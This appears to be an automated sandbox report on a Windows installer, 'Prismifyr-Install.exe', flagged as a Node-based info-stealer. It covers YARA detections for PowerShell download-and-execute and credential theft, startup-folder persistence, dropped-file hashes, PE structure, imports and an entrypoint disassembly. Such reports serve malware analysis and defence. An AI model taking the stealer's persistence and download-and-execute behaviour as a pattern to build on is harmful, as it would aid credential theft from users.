                                                                                                                                                                                                                                    • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_NodeStealer_1, Description: Yara detected Node Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe, Author: Joe Security
                                                                                                                                                                                                                                    Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......'!qrc@.!c@.!c@.!.2. {@.!.2. .@.!.2. M@.!15. p@.!15. i@.!15. .@.!./.!o@.!c@.!B@.!.5. a@.!.5. .E.!.5. .D.!.2. t@.!c@.!.A.!.5. `@.!.5. b@.!.5.!b@.!c@.!b@.!.5. b@.!Richc@.!................PE..d......b..........".......*...>.......%........@..............................h...........`...............................................#...(.......d.x*....V...............f.........p.......................(.......8.............*.X............................text.....*.......*................. ..`.rdata...[....*..\....*.............@..@.data....-...)..(....).............@....pdata........V......(+.............@..@_RDATA........d......(9.............@..@.rsrc...x*....d..,...*9.............@..@.reloc........f......V;.............@..B................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):93
                                                                                                                                                                                                                                    Entropy (8bit):4.271218378323433
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:JRBA3/+KjMFAdmgLdI5L/y8pAvaKFMmIFcuyn:RA1jMF4HK5LDuvaKxNn
                                                                                                                                                                                                                                    MD5:D097D4A505F65CC2EE9D32FD7FD41B9D
                                                                                                                                                                                                                                    SHA1:219FE92E87A4735ED357B4930E6EEEB6C30FBEB6
                                                                                                                                                                                                                                    SHA-256:718466249FB3C0CB0685D9AAD717FD4B6B0CE66A95ECE85CF1384E4B8CB7F21F
                                                                                                                                                                                                                                    SHA-512:C2280016B7F27E28E0893B3E2AECCE764B54AB8CBB6BD5F50C8DD50955B48CEFE6C53575DEF33063B1CBC2EE8868C641DD86B1E86625ACED0AC5082C8E69B151
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:'//' is not recognized as an internal or external command,..operable program or batch file...
                                                                                                                                                                                                                                    File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                    Entropy (8bit):6.951556436892716
                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                    • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                    File name:Prismifyr-Install.exe
                                                                                                                                                                                                                                    File size:63'862'037 bytes
                                                                                                                                                                                                                                    MD5:96d6158a2ea98333a66b0505dfb4a95a
                                                                                                                                                                                                                                    SHA1:a598bb3dc9498aa62750b620bb768db4a98d8c78
                                                                                                                                                                                                                                    SHA256:ea2cac9b5dfd6ffcf473ebe646abf512a33b27acefcc470799adb02698f256e7
                                                                                                                                                                                                                                    SHA512:82c29352d9a82af47811e27f9c7ff362e2fc536d8dac598b89bb4438e7c5197fe3604b0c3802ea6771f1bd9db06330b705e916a2d9c75980b01c051f8149ed02
                                                                                                                                                                                                                                    SSDEEP:786432:fMguj8Q4VfvjqFTrYqOFh262PuCH2PFVyd8/Wyn:fiAQIHjkH42L2u+N
                                                                                                                                                                                                                                    TLSH:DAE7BE1633E601A6E5B3E2348AAB4503E772B4534735DBCB325C03152FAFAE46A7E714
                                                                                                                                                                                                                                    File Content Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......'!qrc@.!c@.!c@.!.2. {@.!.2. .@.!.2. M@.!15. p@.!15. i@.!15. .@.!./.!o@.!c@.!B@.!.5. a@.!.5. .E.!.5. .D.!.2. t@.!c@.!.A.!.5. `@.
                                                                                                                                                                                                                                    Icon Hash:0f3bfcfc7979130e
                                                                                                                                                                                                                                    Entrypoint:0x14125e198
                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                    Subsystem:windows cui
                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                    Time Stamp:0x62C8C0EE [Fri Jul 8 23:42:38 2022 UTC]
                                                                                                                                                                                                                                    TLS Callbacks:0x4125dea4, 0x1
                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                    Import Hash:4d0fb8dc9ee470058274f448bebbb85f
                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                                                    call 00007F80A0506850h
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                                                    jmp 00007F80A05062A7h
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov eax, esp
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov dword ptr [eax+08h], ebx
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov dword ptr [eax+10h], ebp
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov dword ptr [eax+18h], esi
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov dword ptr [eax+20h], edi
                                                                                                                                                                                                                                    inc ecx
                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    sub esp, 20h
                                                                                                                                                                                                                                    dec ecx
                                                                                                                                                                                                                                    mov ebx, dword ptr [ecx+38h]
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov esi, edx
                                                                                                                                                                                                                                    dec ebp
                                                                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov ebp, ecx
                                                                                                                                                                                                                                    dec ecx
                                                                                                                                                                                                                                    mov edx, ecx
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov ecx, esi
                                                                                                                                                                                                                                    dec ecx
                                                                                                                                                                                                                                    mov edi, ecx
                                                                                                                                                                                                                                    dec esp
                                                                                                                                                                                                                                    lea eax, dword ptr [ebx+04h]
                                                                                                                                                                                                                                    call 00007F80A0505925h
                                                                                                                                                                                                                                    mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                    and al, 66h
                                                                                                                                                                                                                                    neg al
                                                                                                                                                                                                                                    mov eax, 00000001h
                                                                                                                                                                                                                                    inc ebp
                                                                                                                                                                                                                                    sbb eax, eax
                                                                                                                                                                                                                                    inc ecx
                                                                                                                                                                                                                                    neg eax
                                                                                                                                                                                                                                    inc esp
                                                                                                                                                                                                                                    add eax, eax
                                                                                                                                                                                                                                    inc esp
                                                                                                                                                                                                                                    test dword ptr [ebx+04h], eax
                                                                                                                                                                                                                                    je 00007F80A0506443h
                                                                                                                                                                                                                                    dec esp
                                                                                                                                                                                                                                    mov ecx, edi
                                                                                                                                                                                                                                    dec ebp
                                                                                                                                                                                                                                    mov eax, esi
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov edx, esi
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov ecx, ebp
                                                                                                                                                                                                                                    call 00007F80A0509119h
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov ebx, dword ptr [esp+30h]
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov ebp, dword ptr [esp+38h]
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov esi, dword ptr [esp+40h]
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov edi, dword ptr [esp+48h]
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    add esp, 20h
                                                                                                                                                                                                                                    inc ecx
                                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    lea ecx, dword ptr [0130A27Dh]
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    jmp dword ptr [0004CF7Eh]
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov eax, esp
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov dword ptr [eax+18h], ebx
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov dword ptr [eax+20h], esi
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov dword ptr [eax+10h], edx
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    mov dword ptr [eax+08h], ecx
                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                    inc ecx
                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                    inc ecx
                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    sub esp, 30h
                                                                                                                                                                                                                                    dec ebp
                                                                                                                                                                                                                                    mov edi, ecx
                                                                                                                                                                                                                                    dec ebp
                                                                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x205c9f00x231894.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x228e2840xf0.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x264b0000x22a78.rsrc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x256a0000xdfecc.pdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x266e0000x201f4.reloc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x1f4e5100x70.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x1f4e7000x28.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1f4e5800x138.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x12ab0000xc58.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                    .text0x10000x12a9f800x12aa000a68bf38c27f1c9777e7256dbf52a2e32unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .rdata0x12ab0000xfe5bf80xfe5c004db8e41fff4df254df2eedf81d6c2940unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .data0x22910000x2d87cc0x22800ec94c9183eeea0a1dee0f4e89ca6f8d7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .pdata0x256a0000xdfecc0xe00009e7c8d93702d4532db1795a99911a4b0False0.4792698451450893data6.798277330618298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    _RDATA0x264a0000xf40x200ecb4bbe56e47c45a2388a28f6b547d3aFalse0.318359375data2.9103684793485693IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .rsrc0x264b0000x22a780x22c00db6ed472b000243688d70fc984344be5False0.4374437949640288data6.164524183815661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .reloc0x266e0000x201f40x20200d5809755ca5d408e8a1e4c3932b51246False0.18949872324902725data5.485519338286437IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                    RT_ICON0x264b2200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/mEnglishUnited States0.6214539007092199
                                                                                                                                                                                                                                    RT_ICON0x264b6880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/mEnglishUnited States0.37406191369606
                                                                                                                                                                                                                                    RT_ICON0x264c7300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/mEnglishUnited States0.28226141078838174
                                                                                                                                                                                                                                    RT_ICON0x264ecd80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/mEnglishUnited States0.23358526216343883
                                                                                                                                                                                                                                    RT_ICON0x2652f000x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/mEnglishUnited States0.1762244173666154
                                                                                                                                                                                                                                    RT_ICON0x26637280x9ccaPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004235387911704
                                                                                                                                                                                                                                    RT_GROUP_ICON0x266d3f80x5adataEnglishUnited States0.7555555555555555
                                                                                                                                                                                                                                    RT_VERSION0x266d4580x2e8dataEnglishUnited States0.4637096774193548
                                                                                                                                                                                                                                    RT_MANIFEST0x266d7400x336XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (762), with CRLF line terminatorsEnglishUnited States0.5048661800486618
                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                    dbghelp.dllSymSetSearchPathW, SymGetSearchPathW, SymGetModuleBase64, SymFunctionTableAccess64, StackWalk64, SymSetOptions, SymFromAddr, SymInitialize, SymGetLineFromAddr64, SymCleanup, UnDecorateSymbolName
                                                                                                                                                                                                                                    WS2_32.dllgetservbyname, getservbyport, gethostbyaddr, inet_ntoa, inet_addr, WSACleanup, WSASetLastError, ntohs, htonl, ntohl, closesocket, getsockopt, WSAStartup, send, gethostname, __WSAFDIsSet, gethostbyname, accept, sendto, recvfrom, WSAIoctl, recv, FreeAddrInfoW, GetAddrInfoW, GetNameInfoW, select, WSASocketW, WSASend, WSAGetOverlappedResult, WSADuplicateSocketW, shutdown, listen, htons, WSASendTo, WSARecvFrom, WSARecv, setsockopt, getsockname, getpeername, ioctlsocket, connect, bind, WSAGetLastError, socket
                                                                                                                                                                                                                                    IPHLPAPI.DLLConvertInterfaceIndexToLuid, ConvertInterfaceLuidToNameW, GetAdaptersAddresses
                                                                                                                                                                                                                                    PSAPI.DLLGetModuleFileNameExW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                                                                                                                    USERENV.dllGetUserProfileDirectoryW
                                                                                                                                                                                                                                    ADVAPI32.dllCryptGetProvParam, GetUserNameW, RegCloseKey, RegEnumKeyExA, RegOpenKeyExA, RegQueryValueExA, RegEnumKeyExW, RegQueryInfoKeyW, EventWriteTransfer, EventSetInformation, EventUnregister, EventRegister, ReportEventW, RegisterEventSourceW, DeregisterEventSource, CryptEnumProvidersW, CryptSignHashW, CryptDestroyHash, CryptCreateHash, CryptDecrypt, CryptExportKey, CryptGetUserKey, OpenProcessToken, CryptSetHashParam, CryptDestroyKey, CryptReleaseContext, CryptAcquireContextW, SetSecurityInfo, GetSecurityInfo, SetEntriesInAclA, FreeSid, AllocateAndInitializeSid, SystemFunction036, RegGetValueW, RegQueryValueExW, RegOpenKeyExW
                                                                                                                                                                                                                                    USER32.dllGetProcessWindowStation, MapVirtualKeyW, DispatchMessageA, TranslateMessage, MessageBoxW, GetSystemMetrics, GetMessageA, GetUserObjectInformationW
                                                                                                                                                                                                                                    CRYPT32.dllCertCloseStore, CertEnumCertificatesInStore, CertFindCertificateInStore, CertDuplicateCertificateContext, CertFreeCertificateContext, CertGetCertificateContextProperty, CertOpenStore
                                                                                                                                                                                                                                    bcrypt.dllBCryptGenRandom
                                                                                                                                                                                                                                    KERNEL32.dllCreateEventW, RtlCaptureContext, RtlLookupFunctionEntry, IsProcessorFeaturePresent, GetCPInfo, GetStringTypeW, InitializeSListHead, WaitForSingleObjectEx, UnhandledExceptionFilter, InterlockedPushEntrySList, RtlUnwindEx, RtlPcToFileHeader, RaiseException, ExitProcess, GetModuleHandleExW, SetStdHandle, CreateThread, ExitThread, FreeLibraryAndExitThread, GetFileAttributesExW, SetFileAttributesW, GetConsoleOutputCP, GetDriveTypeW, GetCommandLineA, GetCommandLineW, HeapFree, HeapAlloc, CompareStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapReAlloc, SetEndOfFile, OutputDebugStringW, HeapSize, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetProcessHeap, InitializeCriticalSectionAndSpinCount, TryEnterCriticalSection, VerSetConditionMask, VerifyVersionInfoW, GetEnvironmentVariableA, WideCharToMultiByte, GetEnvironmentVariableW, GetLastError, GetLocalTime, SetConsoleCtrlHandler, CloseHandle, WaitForSingleObject, CreateRemoteThread, OpenProcess, OpenFileMappingW, MapViewOfFile, UnmapViewOfFile, GetFileType, RemoveVectoredExceptionHandler, RtlCaptureStackBackTrace, GetStdHandle, GetCurrentProcess, GetCurrentProcessId, VirtualQuery, MultiByteToWideChar, WriteConsoleW, LocalFree, FormatMessageW, InitOnceExecuteOnce, CreateEventA, GetModuleHandleA, GetProcAddress, LoadLibraryA, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetTempPathW, SetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, Sleep, GetProcessTimes, SetPriorityClass, GetPriorityClass, GlobalMemoryStatusEx, GetSystemInfo, GetSystemTimeAsFileTime, GetVersionExW, GetModuleFileNameW, GetProcessIoCounters, VerifyVersionInfoA, FileTimeToSystemTime, GetConsoleTitleW, SetConsoleTitleW, CreateToolhelp32Snapshot, Process32First, Process32Next, SetHandleInformation, CreateIoCompletionPort, SetFileCompletionNotificationModes, CreateFileA, CreateFileW, DuplicateHandle, PostQueuedCompletionStatus, SetEvent, ResetEvent, QueueUserWorkItem, RegisterWaitForSingleObject, UnregisterWait, GetConsoleMode, SetConsoleMode, GetNumberOfConsoleInputEvents, ReadConsoleInputW, ReadConsoleW, FillConsoleOutputCharacterW, FillConsoleOutputAttribute, GetConsoleCursorInfo, SetConsoleCursorInfo, GetConsoleScreenBufferInfo, SetConsoleCursorPosition, SetConsoleTextAttribute, WriteConsoleInputW, CancelIoEx, CancelIo, SwitchToThread, GetStartupInfoW, GetFileAttributesW, TerminateProcess, GetExitCodeProcess, CreateProcessW, UnregisterWaitEx, CreateJobObjectW, AssignProcessToJobObject, SetInformationJobObject, LCMapStringW, RtlUnwind, DeleteCriticalSection, InitializeConditionVariable, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableCS, ReleaseSemaphore, CreateSemaphoreW, GetCurrentThread, ResumeThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetNativeSystemInfo, CreateSemaphoreA, FlushFileBuffers, ReadFile, WriteFile, ConnectNamedPipe, SetNamedPipeHandleState, PeekNamedPipe, CreateNamedPipeW, WaitNamedPipeW, CancelSynchronousIo, CreateNamedPipeA, GetNamedPipeHandleStateA, GetLongPathNameW, GetShortPathNameW, ReadDirectoryChangesW, CreateDirectoryW, FindClose, FindFirstFileW, FindNextFileW, GetDiskFreeSpaceW, GetFileInformationByHandle, GetFileSizeEx, GetFinalPathNameByHandleW, GetFullPathNameW, RemoveDirectoryW, SetFilePointerEx, SetFileTime, DeviceIoControl, FlushViewOfFile, CreateFileMappingA, ReOpenFile, CopyFileW, MoveFileExW, CreateHardLinkW, GetFileInformationByHandleEx, CreateSymbolicLinkW, DebugBreak, FormatMessageA, FreeLibrary, LoadLibraryExW, SetErrorMode, GetQueuedCompletionStatus, GetCurrentThreadId, ReadConsoleA, InitializeSRWLock, ReleaseSRWLockExclusive, ReleaseSRWLockShared, AcquireSRWLockExclusive, AcquireSRWLockShared, VirtualAlloc, VirtualProtect, VirtualFree, VirtualLock, GetACP, GetModuleHandleW, LoadLibraryW, GetSystemTime, SystemTimeToFileTime, GetSystemDirectoryA, SwitchToFiber, DeleteFiber, CreateFiberEx, ConvertFiberToThread, ConvertThreadToFiberEx, RtlVirtualUnwind, AddVectoredExceptionHandler, RtlAddFunctionTable, RtlDeleteFunctionTable, IsDebuggerPresent, OutputDebugStringA, OpenThread, SuspendThread, GetThreadContext, GetLocaleInfoEx, GetNumberFormatEx, GetCurrencyFormatEx, ResolveLocaleName, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, GetTimeFormatEx, GetDateFormatEx, GetVersionExA, ExpandEnvironmentStringsA, GetWindowsDirectoryA, GetTickCount, GetDynamicTimeZoneInformation, GetGeoInfoW, GetUserGeoID, CreateFileMappingW, LocaleNameToLCID, LCIDToLocaleName, TryAcquireSRWLockExclusive, TryAcquireSRWLockShared, SetThreadPriority, GetThreadPriority, QueryThreadCycleTime, DeleteFileA, GetFileSize, GetTempPathA, GetTempFileNameA, GetThreadTimes, MapViewOfFileEx, SleepConditionVariableSRW, SetUnhandledExceptionFilter, InitializeCriticalSectionEx, InitOnceBeginInitialize, InitOnceComplete, EncodePointer, DecodePointer, LCMapStringEx, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree
                                                                                                                                                                                                                                    WINMM.dlltimeGetTime
                                                                                                                                                                                                                                    NameOrdinalAddress
                                                                                                                                                                                                                                    ??$Add@VIsolate@internal@v8@@@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVIsolate@12@V312@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z10x1408fc8a0
                                                                                                                                                                                                                                    ??$Add@VIsolate@internal@v8@@@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVIsolate@12@V312@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z20x1408fc990
                                                                                                                                                                                                                                    ??$Add@VIsolate@internal@v8@@@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVIsolate@12@V312@IV?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z30x1408fca80
                                                                                                                                                                                                                                    ??$Add@VIsolate@internal@v8@@@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVIsolate@12@V312@IV?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z40x1408fcc00
                                                                                                                                                                                                                                    ??$Add@VIsolate@internal@v8@@@OrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@12@PEAVIsolate@12@V?$Handle@VOrderedNameDictionary@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@@Z50x1408f5e10
                                                                                                                                                                                                                                    ??$Add@VLocalIsolate@internal@v8@@@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z60x1408fcd80
                                                                                                                                                                                                                                    ??$Add@VLocalIsolate@internal@v8@@@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z70x1408fce60
                                                                                                                                                                                                                                    ??$Add@VLocalIsolate@internal@v8@@@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@IV?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z80x1408fcf40
                                                                                                                                                                                                                                    ??$Add@VLocalIsolate@internal@v8@@@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@IV?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z90x1408fd080
                                                                                                                                                                                                                                    ??$Add@VLocalIsolate@internal@v8@@@OrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V?$Handle@VOrderedNameDictionary@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@@Z100x1408f6050
